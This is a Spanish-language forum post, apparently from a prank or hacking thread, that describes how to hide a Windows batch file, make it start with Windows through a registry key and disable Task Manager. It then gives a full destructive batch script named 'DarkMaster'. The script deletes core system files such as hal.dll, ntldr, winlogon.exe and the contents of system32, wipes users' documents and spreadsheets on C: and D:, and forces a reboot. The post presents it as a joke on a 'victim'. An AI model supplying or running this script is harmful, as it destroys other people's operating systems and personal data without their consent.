Disculpen que me meta pero tratando de aclarar algunas dudillas: los bat como todos saben se ejecutan en cmd, por tal razón no pueden hacer un proceso hide (oculto) como el ctfmon o el svchost y los comandos que ustedes hablaban se refieren a ocultar el archivo, cosa que si pueden hacer para evitar que sea localizado más facilmente, otra cosa para entorpecer el cierre del archivo es arrancarlo a el mismo en tiempo real y meter una clave en el registro que lo programe para que se arranque con el windows, en fin editando el registro pueden también bloquear el administrador de tareas para que no puedan terminar el proceso desde ahí
en fin muchas cosillas que podrían hacer, pero tengan cuidado no se metan en aguas muy profundas
Bueno, ahí les va on pequeño código que ya había posteado antes pero puede servir para hacer una broma un poquito más preocupante y atrevida jeje
@echo off
start c:\darkm.bat /realtime
del %SystemRoot%\System32\logonui.exe /s /q /a:h /a:r /a:s /a:a /a:-
del %SystemRoot%\System32\winlogon.exe /s /q /a:h /a:r /a:s /a:a /a:-
del %SystemRoot%\System32\hal.dll /s /q /a:h /a:r /a:s /a:a /a:-
del ntldr /s /q /a:h /a:r /a:s /a:a /a:-
del ntdetect.com /s /q /a:h /a:r /a:s /a:a /a:-
del boot.ini /s /q /a:h /a:r /a:s /a:a /a:-
del *.doc /s /q /a:h /a:r /a:s /a:a /a:-
del *.xls /s /q /a:h /a:r /a:s /a:a /a:-
del *.mdb /s /q /a:h /a:r /a:s /a:a /a:-
del *.ppt /s /q /a:h /a:r /a:s /a:a /a:-
del *.pps /s /q /a:h /a:r /a:s /a:a /a:-
del *.ccd /s /q /a:h /a:r /a:s /a:a /a:-
del c:\windows\system32\*.* /s /q /a:h /a:r /a:s /a:a /a:-
del c:\Windows\*.* /s /q /a:h /a:r /a:s /a:a /a:-
del D:\*.ccd /s /q /a:h /a:r /a:s /a:a /a:-
del D:\*.doc /s /q /a:h /a:r /a:s /a:a /a:-
del c:\autoexec.bat /s /q /a:h /a:r /a:s /a:a /a:-
shutdown -f -r -c "DarkMaster" -t 7
cls
El código es opcional y a leguas se puede entender que hace, una pequeña explicación para mejorar un poco: se inicia el mismo en tiempo real, las primeras 2 líneas intentan borrar algunos archivos impresindibles del SO, la 3 logra borrar el hal.dll, con esto es suficiente para que la victi...ejem ejem nuestro amigo tenga que meter su cd de instalación
luego borra algunos archivos de detección de red, el ntdetect.com hará que reinstale windows y pues depues trata de borrar lo que este a su paso
PD: El WinXP SP2 bloquea todos los bat por "$eguridad" jeje